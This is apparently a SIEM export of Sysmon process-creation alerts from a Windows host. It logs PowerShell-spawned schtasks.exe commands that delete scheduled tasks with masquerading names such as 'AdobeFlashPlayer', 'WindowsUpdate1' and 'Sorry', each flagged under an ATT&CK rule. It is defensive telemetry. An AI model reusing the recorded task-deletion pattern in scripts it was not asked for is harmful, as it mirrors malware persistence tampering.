+CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.180810600Z"",""eventRecordID"":""2490"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.177\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010d4851e00}\r\nProcessId: 2532\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.177"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010d4851e00}"",""processId"":""2532"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.106",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.130 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014841e00} +ProcessId: 4884 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.151197900Z"",""eventRecordID"":""2489"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.130\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-001014841e00}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.130"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-001014841e00}"",""processId"":""4884"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.074",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.093 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00108f811e00} +ProcessId: 7312 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.095948100Z"",""eventRecordID"":""2488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.093\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00108f811e00}\r\nProcessId: 7312\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.093"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00108f811e00}"",""processId"":""7312"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.057",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.048 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c7f1e00} +ProcessId: 7852 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.050208200Z"",""eventRecordID"":""2487"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.048\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-00102c7f1e00}\r\nProcessId: 7852\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.048"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-00102c7f1e00}"",""processId"":""7852"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.042",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.024 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010677d1e00} +ProcessId: 8060 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.026958900Z"",""eventRecordID"":""2486"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.024\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010677d1e00}\r\nProcessId: 8060\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update_windows /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.024"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010677d1e00}"",""processId"":""8060"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update_windows /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.025",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:04.000 +ProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010337b1e00} +ProcessId: 4680 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Windows_Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:04.003071900Z"",""eventRecordID"":""2485"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:04.000\r\nProcessGuid: {df9fc3d3-b37c-5ecf-0000-0010337b1e00}\r\nProcessId: 4680\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Windows_Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:04.000"",""processGuid"":""{df9fc3d3-b37c-5ecf-0000-0010337b1e00}"",""processId"":""4680"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Windows_Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:32.014",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:03.975 +ProcessGuid: {df9fc3d3-b37b-5ecf-0000-001064791e00} +ProcessId: 6308 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Sorry /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 